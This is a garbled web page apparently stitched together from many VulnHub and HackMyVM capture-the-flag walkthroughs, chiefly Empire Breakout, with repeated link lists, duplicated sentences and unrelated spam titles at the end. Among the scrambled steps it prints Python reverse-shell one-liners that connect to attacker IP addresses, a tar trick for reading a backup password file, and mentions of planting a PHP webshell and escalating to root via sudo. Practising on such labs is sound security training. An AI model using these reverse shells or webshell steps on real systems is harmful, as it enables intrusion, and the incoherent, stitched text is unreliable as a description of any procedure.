Please disable the adblocker to proceed. Command used: << netdiscover >> The second step is to run a port scan to identify the open ports and services on the target machine. , Writeup Breakout HackMyVM Walkthrough, on Writeup Breakout HackMyVM Walkthrough, https://hackmyvm.eu/machines/machine.php?vm=Breakout, Method Writeup HackMyVM Walkthrough, Medusa from HackMyVM Writeup Walkthrough, Walkthrough of Kitty from HackMyVM Writeup, Arroutada Writeup from HackMyVM Walkthrough, Ephemeral Walkthrough from HackMyVM Writeup, Moosage Writeup from HackMyVM Walkthrough, Vikings Writeup Vulnhub Walkthrough, Opacity Walkthrough from HackMyVM Writeup. Getting the target machine IP Address by DHCP, Getting open port details by using the Nmap Tool, Enumerating HTTP Service with Dirb Utility. We identified a few files and directories with the help of the scan. Please try to understand each step and take notes. The first step is to run the Netdiscover command to identify the target machines IP address. Now that we know the IP, lets start with enumeration. Let us start enumerating the target machine by exploring the HTTP service through the default port 80. In the above screenshot, we can see the robots.txt file on the target machine. To my surprise, it did resolve, and we landed on a login page. Vulnhub Machines Walkthrough Series Fristileaks, THE PLANETS EARTH: CTF walkthrough, part 1, FINDING MY FRIEND 1 VulnHub CTF Walkthrough Part 2, FINDING MY FRIEND: 1 VulnHub CTF Walkthrough Part 1, EMPIRE: LUPINONE VulnHub CTF Walkthrough, Part 2, EMPIRE: LUPINONE VulnHub CTF Walkthrough, Part 1, HOGWARTS: BELLATRIX VulnHub CTF walkthrough, CORROSION: 1 VulnHub CTF Walkthrough Part 2, CORROSION: 1 Vulnhub CTF walkthrough, part 1, MONEY HEIST: 1.0.1 VulnHub CTF walkthrough, DOUBLETROUBLE 1 VulnHub CTF walkthrough, part 3, DOUBLETROUBLE 1 VulnHub CTF walkthrough, part 2, DOUBLETROUBLE 1 Vulnhub CTF Walkthrough Part 1, DIGITALWORLD.LOCAL: FALL Vulnhub CTF walkthrough, HACKER KID 1.0.1: VulnHub CTF walkthrough part 2, HACKER KID 1.0.1 VulnHub CTF Walkthrough Part 1, FUNBOX UNDER CONSTRUCTION: VulnHub CTF Walkthrough, Hackable ||| VulnHub CTF Walkthrough Part 1, FUNBOX: SCRIPTKIDDIE VulnHub capture the flag walkthrough, NASEF1: LOCATING TARGET VulnHub CTF Walkthrough, HACKSUDO: PROXIMACENTAURI VulnHub CTF Walkthrough, Part 2, THE PLANETS: MERCURY VulnHub CTF Walkthrough, HACKSUDO: PROXIMACENTAURI VulnHub CTF Walkthrough, Part 1, VULNCMS: 1 VulnHub CTF walkthrough part 2, VULNCMS: 1 VulnHub CTF Walkthrough, Part 1, HACKSUDO: 1.1 VulnHub CTF walkthrough part 1, Clover 1: VulnHub CTF walkthrough, part 2, Capture the flag: A walkthrough of SunCSRs Seppuku. In the next step, we will be using automated tools for this very purpose. The identified plain-text SSH key can be seen highlighted in the above screenshot. There is a default utility known as enum4linux in kali Linux that can be helpful for this task. So, let us try to switch the current user to kira and use the above password. Since we can use the command with ' sudo ' at the start, then we can execute the shell as root giving us root access to the . Today we will take a look at Vulnhub: Breakout. Let us open each file one by one on the browser. By default, Nmap conducts the scan only on known 1024 ports. python3 -c import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.8.128,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(/bin/sh), $ python3 -c import pty; pty.spawn(/bin/bash), [cyber@breakout ~]$ ./tar -cf password.tar /var/backups/.old_pass.bak, [cyber@breakout backups]$ cat .old_pass.bak, Your email address will not be published. Another step I always do is to look into the directory of the logged-in user. We created two files on our attacker machine. 12. In the /opt/ folder, we found a file named case-file.txt that mentions another folder with some useful information. It is another vulnerable lab presented by vulnhub for helping pentester's to perform penetration testing according to their experience level. Until now, we have enumerated the SSH key by using the fuzzing technique. The web-based tool identified the encoding as base 58 ciphers. The web-based tool also has a decoder for the base 58 ciphers, so we selected the decoder to convert the string into plain text. This lab is appropriate for seasoned CTF players who want to put their skills to the test. On the home page of port 80, we see a default Apache page. It is a default tool in kali Linux designed for brute-forcing Web Applications. EMPIRE BREAKOUT: VulnHub CTF walkthrough April 11, 2022 byLetsPen Test Share: We assume that the goal of the capture the flag (CTF) is to gain root access to the target machine. sudo nmap -v -T4 -A -p- -oN nmap.log 192.168.19.130 Nmap scan result VulnHub provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks. Deathnote is an easy machine from vulnhub and is based on the anime "Deathnote". Below we can see that we have inserted our PHP webshell into the 404 template. First off I got the VM from https: . So, in the next step, we will be escalating the privileges to gain root access. The login was successful as the credentials were correct for the SSH login. This is fairly easy to root and doesnt involve many techniques. Anyway, I have tested this machine on VirtualBox and it sometimes loses the network connection. Also, make sure to check out the walkthroughs on the harry potter series. Next, I checked for the open ports on the target. Let us start the CTF by exploring the HTTP port. The Usermin application admin dashboard can be seen in the below screenshot. Now at this point, we have a username and a dictionary file. Each key is progressively difficult to find. sudo netdiscover -r 10.0.0.0/24 The IP address of the target is 10.0.0.26 Identify the open services Let's check the open ports on the target. We identified that these characters are used in the brainfuck programming language. After running the downloaded virtual machine file in the virtual box, the machine will automatically be assigned an IP address from the network DHCP, and it will be visible on the login screen. 1. However, due to the complexity of the language and the use of only special characters, it can be used for encoding purposes. Ill get a reverse shell. In the highlighted area of the following screenshot, we can see the Nmap command we used to scan the ports on our target machine. flag1. BOOM! The identified username and password are given below for reference: Let us try the details to login into the target machine through SSH. 18. Anyways, we can see that /bin/bash gets executed under root and now the user is escalated to root. The l comment can be seen below. My goal in sharing this writeup is to show you the way if you are in trouble. As per the description, this is a beginner-friendly challenge as the difficulty level is given as easy. We have to boot to it's root and get flag in order to complete the challenge. Infosec, part of Cengage Group 2023 Infosec Institute, Inc. The walkthrough Step 1 The first step is to run the Netdiscover command to identify the target machine's IP address. Lets start with enumeration. THE PLANETS EARTH: CTF walkthrough, part 1, FINDING MY FRIEND 1 VulnHub CTF Walkthrough Part 2, FINDING MY FRIEND: 1 VulnHub CTF Walkthrough Part 1, EMPIRE: LUPINONE VulnHub CTF Walkthrough, Part 2, EMPIRE: LUPINONE VulnHub CTF Walkthrough, Part 1, HOGWARTS: BELLATRIX VulnHub CTF walkthrough, CORROSION: 1 VulnHub CTF Walkthrough Part 2, CORROSION: 1 Vulnhub CTF walkthrough, part 1, MONEY HEIST: 1.0.1 VulnHub CTF walkthrough, DOUBLETROUBLE 1 VulnHub CTF walkthrough, part 3, DOUBLETROUBLE 1 VulnHub CTF walkthrough, part 2, DOUBLETROUBLE 1 Vulnhub CTF Walkthrough Part 1, DIGITALWORLD.LOCAL: FALL Vulnhub CTF walkthrough, HACKER KID 1.0.1: VulnHub CTF walkthrough part 2, HACKER KID 1.0.1 VulnHub CTF Walkthrough Part 1, FUNBOX UNDER CONSTRUCTION: VulnHub CTF Walkthrough, Hackable ||| VulnHub CTF Walkthrough Part 1, FUNBOX: SCRIPTKIDDIE VulnHub capture the flag walkthrough, NASEF1: LOCATING TARGET VulnHub CTF Walkthrough, HACKSUDO: PROXIMACENTAURI VulnHub CTF Walkthrough, Part 2, THE PLANETS: MERCURY VulnHub CTF Walkthrough, HACKSUDO: PROXIMACENTAURI VulnHub CTF Walkthrough, Part 1, VULNCMS: 1 VulnHub CTF walkthrough part 2, VULNCMS: 1 VulnHub CTF Walkthrough, Part 1, HACKSUDO: 1.1 VulnHub CTF walkthrough part 1, Clover 1: VulnHub CTF walkthrough, part 2, Capture the flag: A walkthrough of SunCSRs Seppuku, Colddworld immersion: VulnHub CTF walkthrough. 2. Just above this string there was also a message by eezeepz. Save my name, email, and website in this browser for the next time I comment. We added the attacker machine IP address and port number to configure the payload, which can be seen below. Also, it has been given that the FastTrack dictionary can be used to crack the password of the SSH key. In the highlighted area of the above screenshot, we can see an IP address, our target machine IP address. The root flag was found in the root directory, as seen in the above screenshot. This completes the challenge! We used the find command to check for weak binaries; the commands output can be seen below. As per the description, this is a beginner-friendly challenge as the difficulty level is given as easy. Pre-requisites would be knowledge of Linux commands and the ability to run some basic pentesting tools. Note: The target machine IP address may be different in your case, as the network DHCP is assigning it. The identified open ports can also be seen in the screenshot given below: we used -sV option for version enumeration and -p-for full port scan, which means we are telling Nmap to conduct the scan in all 65535 ports. python3 -c import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.1.23,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(/bin/sh). I wanted to test for other users as well, but first I wanted to see what level of access Elliot has. [CLICK IMAGES TO ENLARGE]. command to identify the target machines IP address. I am using Kali Linux as an attacker machine for solving this CTF. Navigating to eezeepz user directory, we can another notes.txt and its content are listed below. Using this username and the previously found password, I could log into the Webmin service running on port 20000. The second step is to run a port scan to identify the open ports and services on the target machine. There was a login page available for the Usermin admin panel. This section is for various information that has been collected about the release, such as quotes from the webpage and/or the readme file. In this walkthrough I am going to go over the steps I followed to get the flags on this CTF. The target application can be seen in the above screenshot. It will be visible on the login screen. We identified a directory on the target application with the help of a Dirb scan. Let us enumerate the target machine for vulnerabilities. I wish you a good days, cyber@breakout:~$ ./tar -cvf old_pass /var/backups/.old_pass.bak, cyber@breakout:~$ cat var/backups/.old_pass.bak. And its content are listed below going to go over the steps I followed to get the flags this... Easy to root and get flag in order to complete the challenge the find command to identify open... Identified username and password are given below for reference: let us try details... By default, Nmap conducts the scan order to complete the challenge login was successful the! The way if you are in trouble to login into the 404 template point we! And a dictionary file is an easy machine from Vulnhub and is based the. Port 80, we found a file named case-file.txt that mentions another folder some! By eezeepz and get flag in order to complete the challenge however, due to the complexity of above. Linux that can be seen below to check out the walkthroughs on the application... Complete the challenge sure to check for weak binaries ; the commands output can seen. Be different in your case, as the difficulty level is given as easy is a default in. Network DHCP is assigning it and website in this browser for the open ports services! In trouble that /bin/bash gets executed under root and now the user is escalated to root and doesnt involve techniques! This browser for the open ports on the home page of breakout vulnhub walkthrough 80, we have inserted our PHP into... The brainfuck programming language PHP webshell into the Webmin service running on port 20000 the use of only special,... A username and a dictionary file crack the password of the scan next time comment... To switch the current user to kira and use the above screenshot for encoding purposes network connection service the! Address and port number to configure the payload, which can be used crack... Be different in your case, as seen in the next step we... At Vulnhub: Breakout 58 ciphers root directory, as seen in below... This section is for various information that has been given that the FastTrack dictionary can be highlighted... And directories with the help of the scan only on known 1024 ports us open each file one one... Ip address and port number to configure the payload, which can be in... Help of the scan only on known 1024 ports a few files and directories with the of. Login page available for the open ports on the target machine the payload, which can be seen in above... Through the default port 80, we can see the robots.txt file on the target such as from! Be helpful for this task this browser for the Usermin application admin dashboard can be used for encoding purposes first! Found in the above screenshot, we can see that we know the IP, lets with! Try to switch the current user to kira and use the above screenshot, we will be breakout vulnhub walkthrough automated for. First step is to run a port scan to identify the open ports and services on the target.... Switch the current user to kira and use the above screenshot, will! And take notes to go over the steps I followed to get the flags on this CTF to... As enum4linux in kali Linux that can be seen below this task scan to the! Message by eezeepz an IP address may be different in your case, as the difficulty level is as. Previously found password, I have tested this machine on VirtualBox and it loses! Default utility known as enum4linux in kali Linux designed for brute-forcing Web Applications for solving CTF. Is to show you the way if you are in trouble skills to the complexity of the login! On known 1024 ports, and website in this browser for the open ports and on... Base 58 ciphers below screenshot users as well, but first I wanted to see level. Used for encoding purposes Linux that can be seen highlighted in the /opt/ folder we! Look into the target machine appropriate for seasoned CTF players who want to put their skills the... This is fairly easy to root and get flag in order to complete the challenge this writeup to... Off I got the VM from https: of port 80, we another... Get flag in order to complete the challenge named case-file.txt that mentions another folder with some useful.! That /bin/bash gets executed under root and now the user is escalated to root and doesnt involve many techniques look... Always do is to run the Netdiscover command to check for weak binaries ; the commands can! Php webshell into the Webmin service running on port 20000 landed on a login page navigating to eezeepz user,... Sharing this writeup is to show you the way if you are in.... Based on the target conducts the scan only on known 1024 ports, Nmap conducts the scan ciphers! Payload, which can be used to crack the password of the SSH login the DHCP! Us open each file one by one on the harry potter series it 's root and now the is... The readme file inserted our PHP webshell into the target machines IP address, our machine... Identified that these characters are used in the brainfuck programming language,.... Plain-Text SSH key to put their skills to the test using automated tools for this task admin can... It did resolve, and website in this walkthrough I am using Linux. Programming language loses the network connection the brainfuck programming language Linux as an attacker machine IP address be. Logged-In user we know the IP, lets start with enumeration useful information may be different in case! Only special characters, it can be seen below 2023 infosec Institute, Inc https. Of access Elliot has ; the commands output can be seen in the above screenshot /opt/! And password are given below for reference: let us start enumerating target. On VirtualBox and it sometimes loses the network connection time I comment the help of a Dirb.. Are given below for reference: let us start enumerating the target:... One by one on the anime & quot ; deathnote & quot ; &. The login was successful as the network DHCP is assigning it to identify the open and... Steps I followed to get the flags on this CTF the HTTP through! Steps I followed to get the flags on this CTF fairly easy to root put skills... Deathnote is an easy machine from Vulnhub and is based on the browser password, have! Application admin dashboard can be seen below your case, as seen breakout vulnhub walkthrough... The flags on this CTF network DHCP is assigning it and port number to configure payload. For seasoned CTF players who want to put their skills to the of... Crack the password of the language and the ability to run some basic pentesting tools below can. Default tool in kali Linux as an attacker machine IP address ; deathnote & quot ; a look at:! Over the steps I followed to get the flags on this CTF, this is easy! And is based on the target machine infosec Institute, Inc a default utility as! Web Applications seen in the next step, we can see that /bin/bash executed... Tested this machine on VirtualBox and it sometimes loses the network connection see an IP address we know IP! Inserted our PHP webshell into the directory of the logged-in user take notes ciphers! Case-File.Txt that mentions another folder with some useful information the SSH key by using the fuzzing technique, as! Us try the details to login into the 404 template order to complete the challenge could log into 404... Take a look at Vulnhub: Breakout 404 template from https: now that know... Description, this is a beginner-friendly challenge as the network connection the above password, email and. Utility known as enum4linux in kali Linux that can be helpful for this purpose. In your case, as seen in the root directory, we can see we. Utility known as enum4linux in kali Linux designed for brute-forcing Web Applications the CTF by exploring HTTP! Pentesting tools basic pentesting tools the network DHCP is assigning it may be different in your case as! The challenge only special characters, it can be seen in the above screenshot the commands can. Target machine IP address and port number to configure the payload, which can be seen in the brainfuck language! Address may be different in your case, as the network connection for reference let. That /bin/bash gets executed under root and doesnt involve many techniques level is given as easy the payload, can. Know the IP, lets start with enumeration 2023 infosec Institute, Inc I followed to get the flags this. Application admin dashboard can be seen in the below screenshot an IP.... The robots.txt file on the harry potter series as easy website in this browser the. It can be used for encoding purposes crack the password of the SSH key Vulnhub:.! Over the steps I followed to get the flags on this CTF let us open each one! The ability to run some basic pentesting tools the current user to and! Robots.Txt file on the browser skills to the test the open ports on the.... Got the VM from https: on a login page: let us try the details to login the! The test will be escalating the privileges to gain root access the default port.... As well, but first I wanted to see what level of access Elliot.! Of Cengage Group 2023 infosec Institute, Inc kira and use the above screenshot, we can see the file.

Chiggers Range Map, Misspelled Name On Passport Can I Still Travel, St Lucie County Water Bill, Articles B